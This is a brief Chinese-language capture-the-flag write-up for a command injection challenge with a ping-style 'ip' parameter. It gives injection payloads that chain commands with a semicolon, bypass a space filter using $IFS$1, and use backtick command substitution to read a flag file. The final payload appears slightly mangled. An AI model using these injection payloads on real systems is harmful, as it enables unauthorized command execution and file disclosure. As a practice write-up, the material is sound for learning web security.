開啟後,發現顯示一個 /?ip=
我們直接在url裡新增/?ip=127.0.0.1,發現有回顯,這時候就可以用分號;來進行命令連結執行了。
輸入url/?ip=127.0.0.1;ls
回顯出來兩個php檔案!
直接構造payload:/?ip=127.0.0.1;cat /flag.php
才發現沒那麼簡單,回顯過濾了空格,可以使用$IFS$1來繞過空格,來進行檢視。
再次構造payload:/?ip=127.0.0.1;cat$IFS$1flag.php
發現還是被過濾了
直接先檢視index.php
過濾了很多很多
最後構造payload:/?ip=127.0.0.1;cat$IFS$1ls`` ---- ls用反引號包裹,鍵盤左上角esc下面
最後f12鍵檢視原始碼後即可得到flag
